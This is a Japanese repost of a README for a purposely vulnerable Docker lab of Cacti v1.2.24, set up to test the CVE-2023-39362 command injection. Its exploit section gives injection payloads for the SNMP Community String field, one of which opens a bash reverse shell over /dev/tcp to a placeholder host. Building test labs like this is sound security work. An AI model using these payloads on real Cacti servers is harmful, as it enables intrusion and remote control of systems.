cacti-rce-snmp-options-vulnerable-application — 警告: これはCactiのコマンドインジェクション(CVE-2023-39362)のエクスプロイトをテストするための脆弱なアプリケーションです。自己責任で実行してください! | Kitploit
m3ssap0/cacti-rce-snmp-options-vulnerable-applicationcacti-rce-snmp-options-vulnerable-application
警告: これはCactiのコマンドインジェクション(CVE-2023-39362)のエクスプロイトをテストするための脆弱なアプリケーションです。自己責任で実行してください!
21年前
コミュニティで最も使われているツールを見つけましょう。
Cacti v1.2.24 認証済みコマンドインジェクション (CVE-2023-39362) 脆弱性アプリケーション
これは Cacti の脆弱性 (CVE-2023-39362) に対するエクスプロイトをテストするための脆弱性アプリケーションです。
警告!
このアプリケーションには深刻なセキュリティ脆弱性が含まれています。自己責任で実行してください!バックアップがあり隔離された環境(最近のスナップショットとホストオンリーネットワークを備えたVMなど)の使用を推奨します。このアプリケーションをインターネットに接続されたサーバーにアップロードしないでください。侵害されます。
免責事項: 私は、誰もがこのアプリケーションを使用する方法について責任を負いません。このアプリケーションの唯一の目的は、CVE-2023-39362 エクスプロイトのテストシナリオとなることであり、悪意を持って使用されるべきではありません。このアプリケーションのインストールによってサーバーが侵害された場合、それは私の責任ではなく、アップロードしてインストールした人物の責任です。
脆弱性情報
使用方法
環境をセットアップする手順は次のとおりです:
docker compose up -d を実行して構成を開始します。
- http://127.0.0.1/cacti にアクセスして Cacti 初期化ウィザードを開始すると、手順を完了できます。データベースに関するエラーが発生した場合は、少し待ってからページを更新してください。
- デフォルトの認証情報は
admin/ です。
admin
ウィザード中はすべてのボタンで「Next」を押し、適宜オプションを選択します。デフォルトのままで問題なく、必須の前提条件はすべて満たされているはずです。インストール後、admin としてログインします。「Console」→「Configuration」→「User」の順に移動します。guest ユーザーをクリックします。「Enable」で有効にし、パスワードを設定します。必要に応じて「Must Change Password at Next Login」を無効にします。「Save」ボタンをクリックします。「Permissions」セクションに移動します。「General Administration」の下で、「Console Access」と「Sites/Devices/Data」を有効にします。「Save」ボタンをクリックします。ログアウトして guest として再ログインし、エクスプロイトを試します。テスト用 SNMP デバイスのホスト名は monitored_snmp_device です。
環境を破棄するには、docker compose down コマンドを使用します。
Cacti の公式インストールガイドは こちら にあります。
根本原因
エクスプロイト
- 「Console」→「Create」→「New Device」に移動します。
- SNMP バージョン 1 または 2 をサポートするデバイスを作成します。
- デバイスに次のテンプレートのいずれかを含むグラフがあることを確認します:
- 「Net-SNMP - Combined SCSI Disk Bytes」
- 「Net-SNMP - Combined SCSI Disk I/O」
- (テンプレート「Net-SNMP Device」からデバイスを作成すると、グラフの前提条件を満たします)
- 「SNMP Options」の「SNMP Community String」フィールドに次のような値を使用します:
public\' ; touch /tmp/m3ssap0 ; \' 。
- 「Create」ボタンをクリックします。
/tmp 以下に作成されたファイルが存在することを確認します。
リバースシェルを取得するには、次のようなペイロードを使用できます。
public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'
著作者
- Antonio Francesco Sardella - 脆弱性報告者 - m3ssap0
ライセンス
このプロジェクトは Unlicense の下でライセンスされています。詳細は LICENSE ファイルを参照してください。